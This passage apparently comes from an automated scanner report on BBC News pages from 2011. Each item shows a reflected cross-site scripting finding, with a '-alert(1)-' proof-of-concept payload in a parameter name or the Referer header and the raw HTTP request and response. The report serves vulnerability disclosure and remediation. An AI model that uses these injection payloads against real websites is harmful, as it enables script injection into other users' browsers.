The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45bc0'-alert(1)-'6946333a7ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437922?45bc0'-alert(1)-'6946333a7ea=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:35 GMT
Keep-Alive: timeout=10, max=793
Expires: Sat, 12 Feb 2011 02:03:35 GMT
Connection: close
Set-Cookie: BBC-UID=74dd55a5fe2a37f74b7a6f7a6142fce8dcd262a20000c139cb2be3cf67148af80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:35 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=74dd55a5fe2a37f74b7a6f7a6142fce8dcd262a20000c139cb2be3cf67148af80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:35 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476215000,
       editionToServe: 'us',
       queryString: '45bc0'-alert(1)-'6946333a7ea=1',
       referrer: null,
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437922',
       assetType:
...[SNIP]...

1.52. http://www.bbc.co.uk/news/world-south-asia-12427513 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427513

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 126a9'-alert(1)-'a4ab1c22469 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-south-asia-12427513?126a9'-alert(1)-'a4ab1c22469=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:36 GMT
Keep-Alive: timeout=10, max=799
Expires: Sat, 12 Feb 2011 02:03:36 GMT
Connection: close
Set-Cookie: BBC-UID=742dc5a59eca4778c9f10fc281954661e477250860b001595b1ba37fe8d4961c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:36 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=742dc5a59eca4778c9f10fc281954661e477250860b001595b1ba37fe8d4961c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:36 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476216000,
       editionToServe: 'us',
       queryString: '126a9'-alert(1)-'a4ab1c22469=1',
       referrer: null,
       section: 'south-asia',
       sectionPath: '/World/South Asia',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427513',
       assetType: 's
...[SNIP]...

1.53. http://www.bbc.co.uk/news/world-south-asia-12427518 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427518

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f4b5'-alert(1)-'62ff340d451 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-south-asia-12427518?3f4b5'-alert(1)-'62ff340d451=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:37 GMT
Keep-Alive: timeout=10, max=777
Expires: Sat, 12 Feb 2011 02:03:37 GMT
Connection: close
Set-Cookie: BBC-UID=144d15a51eda0729fac7011e914cc14b09d64a14a0c091a96beb223ab6cc84360Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:37 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=144d15a51eda0729fac7011e914cc14b09d64a14a0c091a96beb223ab6cc84360Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:37 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476217000,
       editionToServe: 'us',
       queryString: '3f4b5'-alert(1)-'62ff340d451=1',
       referrer: null,
       section: 'south-asia',
       sectionPath: '/World/South Asia',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427518',
       assetType: 's
...[SNIP]...

1.54. http://www.bbc.co.uk/news/world-south-asia-12437087 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12437087

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d842'-alert(1)-'6a07d65281f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-south-asia-12437087?9d842'-alert(1)-'6a07d65281f=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:37 GMT
Keep-Alive: timeout=10, max=786
Expires: Sat, 12 Feb 2011 02:03:37 GMT
Connection: close
Set-Cookie: BBC-UID=747d15f55e9a17b929c61a2ea19f5ed220724ef93070917fc2b9104b878df11c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:37 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=747d15f55e9a17b929c61a2ea19f5ed220724ef93070917fc2b9104b878df11c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:37 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476217000,
       editionToServe: 'us',
       queryString: '9d842'-alert(1)-'6a07d65281f=1',
       referrer: null,
       section: 'south-asia',
       sectionPath: '/World/South Asia',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437087',
       assetType: 's
...[SNIP]...

1.55. http://www.bbc.co.uk/news/world-us-canada-12411274 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12411274

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ee05'-alert(1)-'ae30755afbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12411274?1ee05'-alert(1)-'ae30755afbc=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:38 GMT
Keep-Alive: timeout=10, max=799
Expires: Sat, 12 Feb 2011 02:03:38 GMT
Connection: close
Set-Cookie: BBC-UID=e45d7525ae7ab7ba390d9f2201360bcb3a8e889ab0c0418a84fb9aa442cc7b8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:38 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e45d7525ae7ab7ba390d9f2201360bcb3a8e889ab0c0418a84fb9aa442cc7b8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:38 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476218000,
       editionToServe: 'us',
       queryString: '1ee05'-alert(1)-'ae30755afbc=1',
       referrer: null,
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12411274',
       assetTy
...[SNIP]...

1.56. http://www.bbc.co.uk/news/world-us-canada-12435117 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12435117

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48594'-alert(1)-'c193dc087b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12435117?48594'-alert(1)-'c193dc087b4=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:40 GMT
Keep-Alive: timeout=10, max=781
Expires: Sat, 12 Feb 2011 02:03:40 GMT
Connection: close
Set-Cookie: BBC-UID=14add5a5fe3ae72ceb490a1bc1562a84aa9e45cec0709233072d6324ac48e3b00Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:40 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=14add5a5fe3ae72ceb490a1bc1562a84aa9e45cec0709233072d6324ac48e3b00Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:40 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476220000,
       editionToServe: 'us',
       queryString: '48594'-alert(1)-'c193dc087b4=1',
       referrer: null,
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12435117',
       assetTy
...[SNIP]...

1.57. http://www.bbc.co.uk/news/world-us-canada-12436383 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12436383

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2944'-alert(1)-'443e909350b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12436383?c2944'-alert(1)-'443e909350b=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:40 GMT
Keep-Alive: timeout=10, max=786
Expires: Sat, 12 Feb 2011 02:03:40 GMT
Connection: close
Set-Cookie: BBC-UID=345db5856e4a770c1b7845a0a1433d6ae51553a1f09081da642baad5b3c19a7a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:40 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=345db5856e4a770c1b7845a0a1433d6ae51553a1f09081da642baad5b3c19a7a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:40 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476220000,
       editionToServe: 'us',
       queryString: 'c2944'-alert(1)-'443e909350b=1',
       referrer: null,
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12436383',
       assetTy
...[SNIP]...

1.58. http://www.bbc.co.uk/news/world-us-canada-12437116 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437116

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d53b'-alert(1)-'7475e3a5be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12437116?1d53b'-alert(1)-'7475e3a5be=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:42 GMT
Keep-Alive: timeout=10, max=752
Expires: Sat, 12 Feb 2011 02:03:42 GMT
Connection: close
Set-Cookie: BBC-UID=949d45e5de4ac7fe6a035c7001c10bf8bc2880a11000e139db8b938e085db3fa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:42 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=949d45e5de4ac7fe6a035c7001c10bf8bc2880a11000e139db8b938e085db3fa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:42 GMT; path=/; domain=bbc.co.uk;
Content-Length: 68931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476222000,
       editionToServe: 'us',
       queryString: '1d53b'-alert(1)-'7475e3a5be=1',
       referrer: null,
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437116',
       assetTy
...[SNIP]...

1.59. http://www.bbc.co.uk/news/world-us-canada-12437121 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437121

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18283'-alert(1)-'23017f3d16d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12437121?18283'-alert(1)-'23017f3d16d=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:41 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:03:41 GMT
Connection: close
Set-Cookie: BBC-UID=a43d0585ee4a373dff70ae6991e51a3a901196699070012a44ab4a75b1712afe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:41 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a43d0585ee4a373dff70ae6991e51a3a901196699070012a44ab4a75b1712afe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:41 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476221000,
       editionToServe: 'us',
       queryString: '18283'-alert(1)-'23017f3d16d=1',
       referrer: null,
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437121',
       assetTy
...[SNIP]...

1.60. http://www.bbc.co.uk/news/business-12434447 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434447

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f15c'-alert(1)-'547b170e2e7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12434447 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7f15c'-alert(1)-'547b170e2e7

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:06 GMT
Keep-Alive: timeout=10, max=567
Expires: Sat, 12 Feb 2011 02:03:06 GMT
Connection: close
Set-Cookie: BBC-UID=e43da555befa35ea2b3ab63351c52ce3fdd6639a50a0d19a044b6a34009ce6f20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e43da555befa35ea2b3ab63351c52ce3fdd6639a50a0d19a044b6a34009ce6f20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476186000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=7f15c'-alert(1)-'547b170e2e7',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12434447',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

1.61. http://www.bbc.co.uk/news/business-12434453 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434453

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae0f0'-alert(1)-'1e57d02e1e9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12434453 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ae0f0'-alert(1)-'1e57d02e1e9

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:06 GMT
Keep-Alive: timeout=10, max=677
Expires: Sat, 12 Feb 2011 02:03:06 GMT
Connection: close
Set-Cookie: BBC-UID=54edf5f5ae0ae5dacb386a2041646433786dff49a06071a98b7b63efebe4723e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=54edf5f5ae0ae5dacb386a2041646433786dff49a06071a98b7b63efebe4723e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476186000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=ae0f0'-alert(1)-'1e57d02e1e9',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12434453',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

1.62. http://www.bbc.co.uk/news/business-12435838 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12435838

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fadb1'-alert(1)-'6267cade542 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12435838 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fadb1'-alert(1)-'6267cade542

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:06 GMT
Keep-Alive: timeout=10, max=715
Expires: Sat, 12 Feb 2011 02:03:06 GMT
Connection: close
Set-Cookie: BBC-UID=04fdd5255ecac5eabbda24652124692f3bdf7eab70e0b1293baba3af77a48af80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=04fdd5255ecac5eabbda24652124692f3bdf7eab70e0b1293baba3af77a48af80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476186000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=fadb1'-alert(1)-'6267cade542',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12435838',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

